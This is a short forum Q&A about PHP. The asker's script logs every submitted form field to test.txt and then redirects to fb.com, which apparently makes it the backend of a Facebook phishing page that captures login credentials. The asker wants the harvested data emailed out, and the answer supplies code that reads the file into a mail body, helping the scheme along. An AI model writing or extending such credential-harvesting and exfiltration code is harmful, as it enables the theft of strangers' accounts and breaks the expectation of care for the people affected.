# How can i send the contents of test.txt to an email, anyone plss

Tags: php, html, mailboxprocessor

How can i send the contents of test.txt to an email, anyone plss.

```
 <?php
 header("Location: http://fb.com/ ");
 $handle = fopen("test.txt", "a");
 foreach($_POST as $variable => $value) {
  fwrite($handle, $variable);
  fwrite($handle, "=");
  fwrite($handle, $value);
  fwrite($handle, "\r\n");
 }
 fwrite($handle, "\r\n");
 fclose($handle);
 exit;
?>
```

How can i send the contents of test.txt to an email, anyone plss.

Answer (score 0):

Try This -->

```
ob_start(); // Turn on output buffering
include("test.txt"); // include test.txt file
$msg = ob_get_contents(); //Return the contents of file to  $msg variable
ob_end_clean(); //Clean (erase) the output buffer and turn off output buffering here
```

Use $msg variable in your mail body.